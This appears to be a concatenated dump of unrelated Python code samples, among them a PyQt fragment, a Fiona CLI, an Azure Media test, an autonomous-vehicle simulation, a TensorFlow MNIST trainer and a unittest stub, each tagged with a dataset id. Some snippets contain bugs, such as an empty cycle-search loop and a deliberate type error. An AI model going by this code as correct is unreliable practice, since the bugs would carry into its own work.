scrollChildArea.setLayout(gridLayout)
scrollArea.setWidgetResizable(True)
scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
scrollArea.setMinimumHeight(600)
scrollArea.setMaximumHeight(600)
scrollArea.setWidget(scrollChildArea)
# scrollArea.setFrameShape(QFrame().NoFrame)
scrollArea.setStatusTip("Preview")
# """ Get the image from the given URL """
# # Set argument headers={"User-Agent": "Mozilla/5.0"} to cheat the spider/bot agent
# url = Request('http://s17.trafficdeposit.com/blog/img/5aeb0d1c0a832/5c77e2cdecca0/0.jpg')
# data = urllib.request.urlopen(url).read()
#
# image = QImage()
# image.loadFromData(data)
self.setCentralWidget(scrollArea)
self.setWindowTitle("Testing")
self.resize(800, 600)
self.show()
return gridLayout | StarcoderdataPython |
3219271 | from .athletes import AthleteViewSet
from .competitions import CompetitionViewSet
from .lifts import LiftViewSet
from .sessions import SessionViewSet
| StarcoderdataPython |
1657309 | for i in range(0,10):
print(i," saga") | StarcoderdataPython |
8183266 | # Copyright 2021 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
"""Constants that are inlined into RTL modules."""
# TypeCode constants. These are mirrored from the BuiltinTypeCode enum on the
# C++ side (and must match or chaos will ensue).
TYPE_NONE = 1
TYPE_TUPLE = 2
TYPE_LIST = 3
TYPE_STR = 4
TYPE_BYTES = 5
TYPE_EXCEPTION_RESULT = 6
TYPE_TYPE = 7
TYPE_BOOL = 8
TYPE_INTEGER = 9
TYPE_REAL = 0xa
TYPE_COMPLEX = 0xb
TYPE_OBJECT = 0x100
| StarcoderdataPython |
5110109 | from math import *
my_num = 3
print(160 * 4.9)
print(10 % 3)
print(abs(my_num)) # absolute number
print(pow(10, 4)) # ridicare la putere
print(max(1, 3, 4, 5, 5, 6, 7, 8, )) # grabbing the biggest number min - the opposite (floor)
print(round(4.5233)) # rotunjire ceil(another function)
print(ceil(4.4)) # rotunjire
print(sqrt(130)) # patratul unui numar
print(floor(2.3)) # grabbing the lower number
print(type(4.5)) # specifica tipul de date
print(type(my_num)) # specifica tipul de date
print(str(my_num) + " is my fav number ") # string #Concatenare
print(my_num + " is my fav number ") # fara string #eroare voluntara
| StarcoderdataPython |
153016 | <gh_stars>100-1000
"""
Main click group for the CLI. Needs to be isolated for entry-point loading.
"""
import logging
from pkg_resources import iter_entry_points
import sys
import click
from click_plugins import with_plugins
from cligj import verbose_opt, quiet_opt
import fiona
from fiona import __version__ as fio_version
from fiona.session import AWSSession, DummySession
def configure_logging(verbosity):
log_level = max(10, 30 - 10 * verbosity)
logging.basicConfig(stream=sys.stderr, level=log_level)
@with_plugins(ep for ep in list(iter_entry_points('fiona.fio_commands')) +
list(iter_entry_points('fiona.fio_plugins')))
@click.group()
@verbose_opt
@quiet_opt
@click.option(
"--aws-profile",
help="Select a profile from the AWS credentials file")
@click.option(
"--aws-no-sign-requests",
is_flag=True,
help="Make requests anonymously")
@click.option(
"--aws-requester-pays",
is_flag=True,
help="Requester pays data transfer costs")
@click.version_option(fio_version)
@click.version_option(fiona.__gdal_version__, '--gdal-version',
prog_name='GDAL')
@click.version_option(sys.version, '--python-version', prog_name='Python')
@click.pass_context
def main_group(
ctx, verbose, quiet, aws_profile, aws_no_sign_requests,
aws_requester_pays):
"""Fiona command line interface.
"""
verbosity = verbose - quiet
configure_logging(verbosity)
ctx.obj = {}
ctx.obj["verbosity"] = verbosity
ctx.obj["aws_profile"] = aws_profile
envopts = {"CPL_DEBUG": (verbosity > 2)}
if aws_profile or aws_no_sign_requests:
session = AWSSession(
profile_name=aws_profile,
aws_unsigned=aws_no_sign_requests,
requester_pays=aws_requester_pays,
)
else:
session = DummySession()
ctx.obj["env"] = fiona.Env(session=session, **envopts)
| StarcoderdataPython |
11263890 | import pytest
from azure.media.analyticsedge import *
class TestGraphBuildSerialize():
def test_build_graph_serialize(self):
graph_topology_name = "graphTopology1"
graph_properties = MediaGraphTopologyProperties()
graph_properties.description = "Continuous video recording to an Azure Media Services Asset"
user_name_param = MediaGraphParameterDeclaration(name="rtspUserName",type="String",default="dummyusername")
password_param = MediaGraphParameterDeclaration(name="rtspPassword",type="String",default="<PASSWORD>")
url_param = MediaGraphParameterDeclaration(name="rtspUrl",type="String",default="rtsp://www.sample.com")
source = MediaGraphRtspSource(name="rtspSource", endpoint=MediaGraphUnsecuredEndpoint(url="${rtspUrl}",credentials=MediaGraphUsernamePasswordCredentials(username="${rtspUserName}",password="${rt<PASSWORD>}")))
node = MediaGraphNodeInput(node_name="rtspSource")
sink = MediaGraphAssetSink(name="assetsink", inputs=[node],asset_name_pattern='sampleAsset-${System.GraphTopologyName}-${System.GraphInstanceName}', segment_length="PT0H0M30S",local_media_cache_maximum_size_mi_b=2048,local_media_cache_path="/var/lib/azuremediaservices/tmp/")
graph_properties.parameters = [user_name_param, password_param, url_param]
graph_properties.sources = [source]
graph_properties.sinks = [sink]
graph = MediaGraphTopology(name=graph_topology_name,properties=graph_properties)
set_graph_method = MediaGraphTopologySetRequest(graph=graph)
set_graph_method_serialize = set_graph_method.serialize()
assert set_graph_method_serialize['name'] == graph_topology_name | StarcoderdataPython |
9743629 | from .trace_decorator import trace
from .trace import Trace
| StarcoderdataPython |
240638 | <filename>voice2vec/data/__init__.py
from .spectograms import get_spectrogram
from .voices_data import VoicesData
| StarcoderdataPython |
374334 | <filename>CAV.py
# <NAME>|| AUM NAMAH SHIVAAYA||
# Connected Autonomous Vehicle (CAV) model class file
import numpy as np
import config
from utils import dist, contiguous, objStr
from numpy.random import poisson
from threading import Thread
class CAV:
iter = None # iteration number
ID, timestamp = None, 0 # microseconds (will later set to a random positive number)
logFile, trajFile, trajFileJson = None, None, None # log and trajectory
cont_end = 0 # microseconds ### @USELESS ###
# Graph Related Members
lookAhead, dest = None, None
nbWts = None # similar to graph["neighbours"], but weights get updated in each iteration ### @USELESS ###
SP = None # waypoints indices
FP = None # granula (FP) indices
fpStartTs = None
CZ = None # Conflict Zones (will be dictionary with CAV IDs as keys)
PDG = None # Partial Dependency Graph
carIndices = None # dictionary
CDG = None # Complete Dependency Graph
# Dynamics Related Members
x, y = None, None # m
phi, psi = None, None # heading and steering angle (radians)
v, v_max, v_safe = None, None, None # m/s
a_brake = None # m/s2
a, a_max = None, None # m/s2
lastMcTs = None # us
Others_Info, Others_PDG = None, None # will be dictionary with CAV IDs as keys
def __init__(self, car):
""" Initialization aka `Booting` """
self.nbWts = config.NBs
self.iter = 0
self.ID = car["id"]
self.dest = car["dest"]
self.x, self.y = (car["x"]/100), (car["y"]/100) # LHS is metres
closest_dist, l_WPs = float('inf'), len(config.WPs)
for i in range(l_WPs):
d = dist({ "x" : (self.x * 100), "y" : (self.y * 100) }, config.WPs[i])
if d < closest_dist:
self.lookAhead = i
closest_dist = d
self.find_shortest_path() # computes `self.SP` from `self.lookAhead` and `self.dest`
self.v, self.a, self.phi, self.psi = 0, 0, car["angle"], 0
self.v_max, self.a_max, self.a_brake = car["speed"], car["acc"], car["accBrake"]
self.timestamp = self.lastMcTs = poisson(config.poi_avg["boot_time"])
self.thread = Thread(target = self.execute)
self.logFile = open(f"./logFiles/CAV_{self.ID}.txt", "w")
self.logFile.write(f"ID = {self.ID}, Boot Time = {self.timestamp}\n")
self.logFile.write(f"{self.__str__()}\n")
self.trajFile = open(f"./logFiles/CAV_{self.ID}_traj.csv", "w")
self.trajFile.write(f"ts(ms),x(cm),y(cm),phi(degrees),v(m/s),lookAhead,lookAheadX(cm),lookAheadY(cm)\n")
self.trajFileJson = open(f"./logFiles/CAV_{self.ID}_traj.json", "w")
self.trajFileJson.write(f"[")
def __del__(self):
""" Destructor """
if self.logFile and not self.logFile.closed:
self.logFile.write("\nExiting...\n")
self.logFile.close()
if self.trajFile and not self.trajFile.closed:
self.trajFile.close()
if self.trajFileJson and not self.trajFileJson.closed:
self.trajFileJson.write("\n]")
self.trajFileJson.close()
def __str__(self):
""" Stringification """
ts = "%.3f" % (self.timestamp / 1000)
dest = config.WPs[self.dest]
lookAhead = config.WPs[self.lookAhead]
retStr = f"CAV : ID = {self.ID}, Timestamp = {ts} ms\n"
retStr += f"Look Ahead WP = {self.lookAhead} ({round(lookAhead['x']/100, 3)} m, {round(lookAhead['y']/100, 3)} m), "
retStr += f"Destination WP = {self.dest} ({round(dest['x']/100, 3)} m, {round(dest['y']/100, 3)} m)\n"
retStr += f"fpStartTs = {self.fpStartTs}\n"
retStr += f"lastMcTs = {self.lastMcTs}\n"
retStr += f"Position = ({self.x} m, {self.y} m), Angle (phi) = {self.phi} rad\n"
retStr += f"v = {self.v} m/s, v_max = {self.v_max} m/s, a_brake = {self.a_brake} m/s2\n"
retStr += f"Shortest Path = {self.SP}\n"
return retStr
######## GRAPH ALGORITHMS' STUFF ########
#########################################
def hasReachedDest(self):
""" Return whether destination has been reached. Takes negligible time. """
dt = self.timestamp - self.lastMcTs # us
curr_x = (100 * self.x) + ((self.v * np.cos(self.phi) * dt) / (10**4)) # cm
curr_y = (100 * self.y) + ((self.v * np.sin(self.phi) * dt) / (10**4)) # cm
return dist({ "x" : curr_x, "y" : curr_y }, config.WPs[self.dest]) <= (config.DEST_REACH_THRESHOLD * 100)
def find_shortest_path(self):
"""
[Slow] Dijkstra Algorithm for Shortest Path between `self.lookAhead` and `self.dest`
Output in `self.SP` (consists only of waypoints's indices in config.WPs). Used only once for now.
"""
l_WPs = len(config.WPs)
cost = [float('inf') for i in range(l_WPs)] # costs are in time (milliseconds)
parent = [None for i in range(l_WPs)] # parents
cost[self.lookAhead] = 0 # cost from source = 0
Q = [i for i in range(l_WPs)] # all vertices in Min-Priority Queue (TODO: MAKE THIS EFFICIENT)
while len(Q) > 0:
min_q_idx = np.array([cost[u] for u in Q]).argmin() # get vertex with smallest distance (TODO: MAKE THIS EFFICIENT)
u = Q[min_q_idx]
del Q[min_q_idx]
for nb in self.nbWts[u]:
v, wt = nb["idx"], nb["wt"]
if v in Q:
alt = cost[u] + wt
if alt < cost[v]:
cost[v] = alt
parent[v] = u
sp = [self.dest] # list of vertices
while parent[sp[-1]] != None:
sp.append(parent[sp[-1]])
sp.reverse()
self.SP = sp # consists of waypoints (indices in config.WPs)
def compute_future_path(self):
""" Computing Future Path (made of granulae, which include CAV's current position) """
# self.find_shortest_path() # self.SP gets updated
# no need to recompute `self.SP`. Simply make `SP` = `self.SP`[`self.lookAhead` ...]
SP = self.SP[ self.SP.index(self.lookAhead) : ] # takes poisson(config.poi_avg["sp_time"]) time
self.timestamp += poisson(config.poi_avg["compute_future_path_1"])
self.fpStartTs = self.timestamp # TS as which FP start position is recorded. used in computing TOA in CZ
dt = self.timestamp - self.lastMcTs # us
curr_x = (100 * self.x) + (self.v * np.cos(self.phi) * dt / (10**4)) # cm
curr_y = (100 * self.y) + (self.v * np.sin(self.phi) * dt / (10**4)) # cm
# must add self position if not close enough to SP[0] (aka self.lookAhead)
mustAddSelf = dist({ "x" : curr_x, "y" : curr_y }, config.WPs[SP[0]]) >= config.FP_INCLUSION_THRESHOLD
d_max = self.v_max * ((config.rho/1000) + (self.v_max/np.abs(self.a_brake)))
l_sp = len(SP)
fp, total_dist = [], 0.0 # future points, total distance (cm) covered by these future points
for i in range(0 if mustAddSelf else 1 , l_sp):
rem = (100.0 * d_max) - total_dist # remaining distance (cm)
e_start = config.WPs[SP[i-1]] if (i > 0) else { "x" : curr_x, "y" : curr_y } # starting waypoint of edge
e_end = config.WPs[SP[i]] # ending waypoint of edge
d = dist(e_start, e_end) # edge length (cm)
num_fp = np.ceil(np.min([rem, d]) / (config.b * 100))
for j in range(int(num_fp)):
fp.append({
"x" : ( (d-100*j*config.b)*e_start["x"] + 100*j*config.b*e_end["x"] ) / d,
"y" : ( (d-100*j*config.b)*e_start["y"] + 100*j*config.b*e_end["y"] ) / d,
"e_start" : SP[i-1] if (i > 0) else None, "e_end" : SP[i] # indicates the edge these granulae come from
})
if (rem <= d): break
if i == (l_sp-1):
fp.append({
"x" : e_end["x"], "y" : e_end["y"],
"e_start" : SP[i-1] if (i > 0) else None, "e_end" : SP[i] # indicates the edge these granulae come from
})
break
total_dist += d
self.FP = fp # FP consists of granulae (xy coordinates)
self.timestamp += poisson(config.poi_avg["compute_future_path_2"])
self.logFile.write(f"\nAPPARENT SHORTEST PATH\n{SP}\n")
self.logFile.write(f"\nFUTURE PATH\n{objStr(self.FP)}\n")
def find_conflict_zones_all_CAVs(self):
# first compute self.carIndices
self.carIndices = {}
IDs = [self.ID]
for other_cav_id in self.Others_Info:
IDs.append(other_cav_id)
IDs.sort()
l_IDs = len(IDs)
for i in range(l_IDs):
self.carIndices[IDs[i]] = i
self.PDG = np.zeros((l_IDs, l_IDs)) # lower ID gets lower index (as indicated by above computation)
self.CZ = {} # empty previous results
for other_cav_id in self.Others_Info:
self.find_conflict_zones(other_cav_id)
self.timestamp += poisson(config.poi_avg["find_conflict_zones"]) # placed here because we require deterministic timing
self.logFile.write(f"\nCONFLICT ZONES\n{objStr(self.CZ)}\n")
self.logFile.write(f"\nPDG\n{self.PDG}\n")
def find_conflict_zones(self, other_cav_id):
"""
Find conflict zones between future paths (consists of granulae and associated
edges) `self.FP` and `other.FP`. Also make Partial Dependency Graph (PDG) in parallel.
"""
other = self.Others_Info[other_cav_id]
v_other, fp_other = other["v"], other["FP"]
l_fp, l_fp_other = len(self.FP), len(fp_other)
mp, mp_other = [], [] # edge midpoints (mp[i] is midpoint of fp[i] and fp[i+1])
for i in range(1, l_fp):
tstart, tend = self.FP[i-1], self.FP[i]
mp.append({ "x" : (tstart["x"] + tend["x"]) / 2, "y" : (tstart["y"] + tend["y"]) / 2 })
for i in range(1, l_fp_other):
tstart, tend = fp_other[i-1], fp_other[i]
mp_other.append({ "x" : (tstart["x"] + tend["x"]) / 2, "y" : (tstart["y"] + tend["y"]) / 2 })
# calculate conflicting pairs first
C = []
for i in range(l_fp-1):
for j in range(l_fp_other-1):
if dist(mp[i], mp_other[j]) < (config.d_th * 100): # LHS is in cm
C.append({ "self" : [i], "other" : [j] })
# merge conflicting pairs into conflicting zones (caution: C is a variable length array now)
curr = 0
while True:
if curr >= (len(C)-1):
break
k = curr + 1
while True:
if k >= len(C):
curr += 1
break
combinedZone = contiguous(zone = C[curr], pair = C[k])
if combinedZone == None:
k += 1
continue
C[curr] = combinedZone
del C[k] # no need to increment k after this deletion
l_C = len(C)
for i in range(l_C):
v1, d1_begin, d1_end = C[i]["self"], 0, 0 # d1_begin, d1_end in cm
p, q, special = v1[0], v1[-1], (len(v1) <= 1)
for k in range(p):
d1_begin += dist(self.FP[k], self.FP[k+1])
d1_end = d1_begin
for k in range(p, q):
d1_end += dist(self.FP[k], self.FP[k+1])
d1_begin += 0 if special else (0.5 * dist(self.FP[p], self.FP[p+1]))
d1_end += (1 if special else 0.5) * dist(self.FP[q], self.FP[q+1])
v1 = [p, p+1] if special else v1[1:]
v2, d2_begin, d2_end = C[i]["other"], 0, 0 # d2_begin, d2_end in cm
p, q, special = v2[0], v2[-1], (len(v2) <= 1)
for k in range(p):
d2_begin += dist(fp_other[k], fp_other[k+1])
d2_end = d2_begin
for k in range(p, q):
d2_end += dist(fp_other[k], fp_other[k+1])
d2_begin += 0 if special else (0.5 * dist(fp_other[p], fp_other[p+1]))
d2_end += (1 if special else 0.5) * dist(fp_other[q], fp_other[q+1])
v2 = [p, p+1] if special else v2[1:]
# Times of Arrival (microseconds)
toa1 = (self.fpStartTs + (10000*d1_begin/(self.v if (self.v != 0) else self.v_max)))
toa2 = (other["fpStartTs"] + (10000*d2_begin/(v_other if (v_other != 0) else (other["v_max"]))))
diff, adv = (toa2-toa1), None
if np.abs(diff) <= config.CLOCK_ACCURACY:
adv = self.ID if (self.ID < other_cav_id) else other_cav_id
else:
adv = self.ID if (diff > 0) else other_cav_id
C[i] = { # "cz" is array of indices in self.FP/other.FP, `begin` and `end` are in cm
"self" : { "begin" : (d1_begin/100), "end" : (d1_end/100), "toa" : toa1, "cz" : v1 },
"other" : { "begin" : (d2_begin/100), "end" : (d2_end/100), "toa" : toa2, "cz" : v2 },
"advantage" : adv
}
self.CZ[other_cav_id] = C
if l_C > 0: # for now considering only C[0] for PDG
rowIndex, colIndex = self.carIndices[self.ID], self.carIndices[other_cav_id] # self.ID yields to other_cav_id
if C[0]["advantage"] == self.ID: rowIndex, colIndex = colIndex, rowIndex # other_cav_id yields to self.ID
self.PDG[rowIndex][colIndex] = 1
def construct_CDG(self):
""" Construct CDG from `self.PDG` and `self.Others_PDG` and store it in `self.CDG` """
l_carIndices = len(self.carIndices)
self.CDG = np.zeros((l_carIndices, l_carIndices)) # lower index for lower ID
self.CDG = np.logical_or(self.CDG, self.PDG)
for PDG in self.Others_PDG:
self.CDG = np.logical_or(self.CDG, self.Others_PDG[PDG])
self.timestamp += poisson(config.poi_avg["construct_CDG"])
self.logFile.write(f"\nCDG\n{self.CDG}\n")
def DFS(self, CDG, visited, parent, start, n):
""" Depth First Search (DFS) to detect only ONE cycle """
visited[start] = -1
cycle = []
# flag = 0
for i in range(n):
if CDG[start][i] == True:
if visited[i] == 0:
parent[i] = start
cycle = self.DFS(CDG, visited, parent, i, n)
if cycle != []: return cycle
elif visited[i] == -1: # cycle detected
j = start
while(parent[j]!=i):
cycle.append(j)
j = parent[j]
cycle.append(j)
cycle.append(i)
return cycle
visited[start] = 1
return cycle
def findCycles(self, CDG):
""" Finding cycle: Function is expected to find exactly one cycle and return the nodes invovled in the cycle """
n = np.array(CDG).shape[0]
visited, parent = np.zeros(n), np.arange(n)
for start in range(int(n/n-1)):
if visited[start] == 0:
cycle = self.DFS(CDG, visited, parent, start, n)
print("Cyle: ", cycle)
if(cycle != []):
return cycle
return []
def resolveCycle(self, CDG, cycle, averagedTOA):
min_time, leader = averagedTOA[cycle[0]], cycle[0]
for vehicle in cycle:
if averagedTOA[vehicle] < min_time: min_time, leader = averagedTOA[vehicle], vehicle
n = CDG.shape[0]
for i in range(n):
if CDG[i][leader]: CDG[i][leader], CDG[leader][i] = False, True
return CDG
def ResolveDeadlock(self, averaged_TOA=[]):
cycles = self.findCycles(self.CDG)
while cycles != []:
self.resolveCycle(self.CDG, cycles, averaged_TOA)
cycles = self.findCycles(self.CDG)
return self.CDG
def deadlock_resolution(self):
""" Detect any deadlocks found in `self.CDG` and resolve them usign DFS. Will complete this later. """
self.ResolveDeadlock()
self.timestamp += poisson(config.poi_avg["deadlock_resolution"])
def motion_planner(self):
""" Very basic motion planning: simpl computing safe velocities """
l_FP = len(self.FP)
self.v_safe = [ self.v_max for i in range(l_FP - 1) ] # initially
for other_cav_id in self.CZ:
if len(self.CZ[other_cav_id]) < 1: continue # no confict with car `other_cav_id`
c = self.CZ[other_cav_id][0] # consider only first CZ
if c["advantage"] == self.ID: continue # nothing to do
cz, begin = c["self"]["cz"], c["self"]["begin"]
d_c = [] # FP-edge distances (cm) from cz
for k in range(cz[0]):
tmp_d_c = None
if k == 0: tmp_d_c = (100 * begin) - 0.5 * dist(self.FP[0], self.FP[1])
else: tmp_d_c = d_c[-1] - 0.5 * (dist(self.FP[k-1], self.FP[k]) + dist(self.FP[k], self.FP[k+1]))
if (-10 < tmp_d_c) and (tmp_d_c < 0): tmp_d_c = 0
if tmp_d_c < 0: break
d_c.append(tmp_d_c)
# self.logFile.write(f"\nother_cav_id = {other_cav_id}\nd_c = {d_c}\n")
l_d_c = len(d_c)
rho = config.rho / 1000.0 # s
b = np.abs(self.a_brake) # m/s2
for i in range(l_d_c):
self.v_safe[i] = min(self.v_safe[i], self.v_max, ((( ((b*rho)**2) + (2*b*d_c[i]/100) )**0.5) - (b * rho)))
self.timestamp += poisson(config.poi_avg["motion_planner"])
self.logFile.write(f"\nv_safe\n{self.v_safe}\n")
def PID(self, t=0):
""" Simulate PID controller and vehicle (plant) for time `t` """
if t == 0: return
v_ref, phi_ref = self.v, self.phi
dt = (t / config.PID_ITERS) / 1e6 # t is in microseconds (us)
for _ in range(config.PID_ITERS):
ev, ephi = (v_ref - self.v), (phi_ref - self.phi)
ev_dot, ephi_dot = ((ev-self.v) / dt), ((ephi-self.phi) / dt)
ev_sum, ephi_sum = (self.v + (ev * dt)), (self.phi + (ephi * dt))
a, psi = self.a, self.psi
self.a = (config.kP_a * ev) + (config.kI_a * ev_sum) + (config.kD_a * ev_dot)
if self.a < (-self.a_max): self.a = -self.a_max
elif self.a > self.a_max: self.a = self.a_max
self.psi = (config.kP_psi * ev) + (config.kI_psi * ephi_sum) + (config.kD_psi * ephi_dot)
if self.psi < (-np.pi/8): self.psi = -np.pi/8
elif self.psi > (np.pi/8): self.psi = np.pi/8
x = self.x + (self.v * np.cos(self.phi) * dt)
y = self.y + (self.v * np.sin(self.phi) * dt)
phi = self.phi + (self.v * np.tan(psi) * dt / config.L)
v = self.v + (a * dt)
if v < 0: v = 0
# self.x, self.y, self.phi, self.v = x, y, phi, v
x = self.x + (self.v * np.cos(self.phi) * dt)
y = self.y + (self.v * np.sin(self.phi) * dt)
phi = phi_ref
v = v_ref
if v < 0: v = 0
self.x, self.y, self.phi, self.v = x, y, phi, v
def motion_controller(self):
""" Determine current `self.x` and `self.y`. Compute and save next `self.v` and `self.phi` """
self.timestamp += poisson(config.poi_avg["motion_controller"])
dt = self.timestamp - self.lastMcTs # us
self.lastMcTs = self.timestamp
self.PID(dt)
l_FP = len(self.FP)
cfp_i, d = None, float('inf') # closest FP index and its distance
for i in range(l_FP):
tmp_d = dist({ "x" : (100*self.x), "y" : (100*self.y) }, self.FP[i])
if tmp_d < d:
d = tmp_d
cfp_i = i
self.logFile.write(f"\nclosest_fp = {cfp_i} : {self.FP[cfp_i]}\n")
if cfp_i == 0 : self.v = self.v_safe[0]
elif cfp_i == (l_FP - 1) : self.v = self.v_safe[-1]
else: self.v = 0.5 * ( self.v_safe[cfp_i-1] + self.v_safe[cfp_i] )
self.lookAhead = self.FP[cfp_i]["e_end"] # always defined (not None) and a part of self.SP
self.phi = np.arctan2(
config.WPs[self.lookAhead]["y"] - (self.y * 100), # cm
config.WPs[self.lookAhead]["x"] - (self.x * 100) # cm
)
self.logFile.write(f"\nTS = lastMcTs = {self.timestamp} us\n")
self.logFile.write(f"\nx = {self.x} m, y = {self.y} m\n")
self.logFile.write(f"\nv = {self.v} m/s, phi = {self.phi} radians\n")
tmp = config.WPs[self.lookAhead]
self.logFile.write(f"\nlookAhead = {self.lookAhead} : ({tmp['x']/100} m, {tmp['y']/100} m)\n")
self.trajFile.write(f"{self.timestamp/1000},{self.x*100},{self.y*100},{self.phi*180/np.pi},{self.v},{self.lookAhead},{tmp['x']},{tmp['y']}\n")
self.trajFileJson.write(f"{',' if (self.iter != 0) else ''}\n " + '{')
self.trajFileJson.write(f" \"ts\" : {self.timestamp/1000},")
self.trajFileJson.write(f" \"x\" : {self.x*100}, \"y\" : {self.y*100},")
self.trajFileJson.write(f" \"phi\" : {self.phi * 180.0 / np.pi}, \"v\" : {self.v} " + '}')
######## BROADCASTING STUFF ########
####################################
def broadcast_info(self):
config.S.broadcast({
"ID" : self.ID, "timestamp" : self.timestamp, # this TS is broadcast start time
"v" : self.v, "v_max" : self.v_max,
"FP" : self.FP, "fpStartTs" : self.fpStartTs # this TS is fpStart start time
})
def receive_others_info(self):
others_Info, self.timestamp = config.S.receive()
del others_Info[self.ID]
self.Others_Info = others_Info
# self.logFile.write(f"\nOthers_Info\n{objStr(self.Others_Info)}\n")
def broadcast_PDG(self):
config.S.broadcast({
"ID" : self.ID, "timestamp" : self.timestamp,
"PDG" : self.PDG
})
def receive_others_PDGs(self):
others_PDG, self.timestamp = config.S.receive()
del others_PDG[self.ID]
self.Others_PDG = {}
for ID in others_PDG:
self.Others_PDG[ID] = others_PDG[ID]["PDG"]
# self.logFile.write(f"\nOthers_PDG\n{self.Others_PDG}\n")
def execute(self):
while True: # main loop
self.logFile.write(f"\n########################################\n")
self.logFile.write(f"\n######## ITERATION {self.iter}: ########\n")
self.logFile.write(f"\n########################################\n")
if self.hasReachedDest():
config.S.dontCare()
self.logFile.write(f"TS-{self.timestamp}: Reached Destination.\n")
self.logFile.write(f"Iterations Executed: {self.iter + 1}\n")
exit(0)
self.compute_future_path()
self.broadcast_info()
self.receive_others_info()
self.find_conflict_zones_all_CAVs()
self.broadcast_PDG()
self.receive_others_PDGs()
self.construct_CDG()
self.deadlock_resolution()
self.motion_planner()
self.motion_controller()
# ############################################################################################
# ######## near the point (7.03 m, 5.03 m) let the slow vehicle increase its velocity ########
# ############################################################################################
# if self.ID == 2:
# if dist({ "x" : self.x, "y" : self.y }, { "x" : 7.03, "y" : 5.03 }) <= 0.7:
# self.v_max = 8
self.iter += 1
| StarcoderdataPython |
6569632 | import tensorflow as tf
from logging import getLogger
logger = getLogger(__name__)
class MNISTModel(tf.keras.Model):
def __init__(self):
super(MNISTModel, self).__init__()
self.flatten = tf.keras.layers.Flatten()
self.d1 = tf.keras.layers.Dense(128, activation="relu")
self.d2 = tf.keras.layers.Dense(10, activation="softmax")
def call(self, x):
x = self.flatten(x)
x = self.d1(x)
x = self.d2(x)
return x
class Trainer:
def __init__(self):
self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
self.optimizer = tf.keras.optimizers.Adam()
self.train_loss = tf.keras.metrics.Mean(name="train_loss")
self.train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
name="train_accuracy"
)
@tf.function
def train_step(self, model, images, labels):
with tf.GradientTape() as tape:
predictions = model(images)
loss_val = self.loss(labels, predictions)
gradients = tape.gradient(loss_val, model.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, model.trainable_variables))
self.train_loss(loss_val)
self.train_accuracy(labels, predictions)
class Predictor:
def __init__(self):
self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
self.predict_loss = tf.keras.metrics.Mean(name="predict_loss")
self.predict_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
name="predict_accuracy"
)
@tf.function
def predict_step(self, model, images, labels):
predictions = model(images)
loss_val = self.loss(labels, predictions)
self.predict_loss(loss_val)
self.predict_accuracy(labels, predictions)
class Checkpoint:
def __init__(self, network, optimizer=None):
args = {"net": network}
if optimizer is not None:
args["optimizer"] = optimizer
self.ckpt = tf.train.Checkpoint(**args)
self.manager = tf.train.CheckpointManager(
self.ckpt, "_data/ckpts", max_to_keep=3
)
self.ckpt.restore(self.manager.latest_checkpoint)
if self.manager.latest_checkpoint:
logger.info(f"Restored from {self.manager.latest_checkpoint}")
else:
logger.info("Initializing from scratch.")
def save_counter(self):
return self.ckpt.save_counter.numpy()
def save(self):
return self.manager.save()
| StarcoderdataPython |
1845254 | <filename>modules/dbnd/src/dbnd/_core/task/utils_task.py<gh_stars>100-1000
from dbnd._core.task.task import Task
class UtilityTask(Task):
pass
class DeployTask(UtilityTask):
pass
| StarcoderdataPython |
11372169 | from question_model import Question
from data import question_data
from quiz_brain import QuizBrain
question_bank = []
for q in question_data:
question = Question(q["question"],q["correct_answer"])
question_bank.append(question)
quiz = QuizBrain(question_bank)
while(quiz.still_has_questions()):
quiz.nextQuestion()
print("\nYou completed the Quiz")
print(f"Your final score was: {quiz.score}/{quiz.number}") | StarcoderdataPython |
3206412 | import math
import time
t1 = time.time()
size = 2000
sizet = size*size
s = [0]*sizet
for k in range(1,56):
s[k-1] = (100003-200003*k+300007*k*k*k)%1000000-500000
for k in range(56,4000001):
s[k-1] = (s[k-1-24]+s[k-1-55]+1000000)%1000000-500000
#print(s[10-1],s[100-1])
'''
# test case
s = [-2,5,3,2,9,-6,5,1,3,2,7,3,-1,8,-4,8]
'''
def getrc(n):
return [n//size,n%size]
def ton(r,c):
return r*size+c
# 1-dimension solution
def getla(tset):
maxSoFar = 0
maxToHere = 0
for i in tset:
maxToHere = max(maxToHere+i,0)
maxSoFar = max(maxToHere,maxSoFar)
return maxSoFar
la = 0
for i in range(size):
maxSoFar = 0
maxToHere = 0
for j in range(size):
maxToHere = max(maxToHere+s[ton(i,j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
for j in range(size):
maxSoFar = 0
maxToHere = 0
for i in range(size):
maxToHere = max(maxToHere+s[ton(i,j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
for i in range(size):
maxSoFar = 0
maxToHere = 0
for j in range(i+1):
maxToHere = max(maxToHere+s[ton(i-j,j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
for i in range(1,size):
maxSoFar = 0
maxToHere = 0
for j in range(size-i):
maxToHere = max(maxToHere+s[ton(size-1-j,i+j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
for i in range(size):
maxSoFar = 0
maxToHere = 0
for j in range(size-i):
maxToHere = max(maxToHere+s[ton(j,i+j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
for i in range(1,size):
maxSoFar = 0
maxToHere = 0
for j in range(size-i):
maxToHere = max(maxToHere+s[ton(i+j,j)],0)
maxSoFar = max(maxToHere,maxSoFar)
if maxSoFar > la:
la = maxSoFar
print(la)
print("time:",time.time()-t1)
| StarcoderdataPython |
8184494 | <reponame>shangpf1/python_study
import unittest
import HTMLReport
class CnodeTest(unittest.TestCase):
# 访问数据库可以用此方法
@classmethod
def setUpClass(self):
print('this is setupclass')
# 打开浏览器时用此方法
def setUp(self):
print('this is setup')
def test_01register(self):
print('****test_01register')
def test_02login(self):
print('****test_02login')
# 截屏可以用此方法
def tearDown(self):
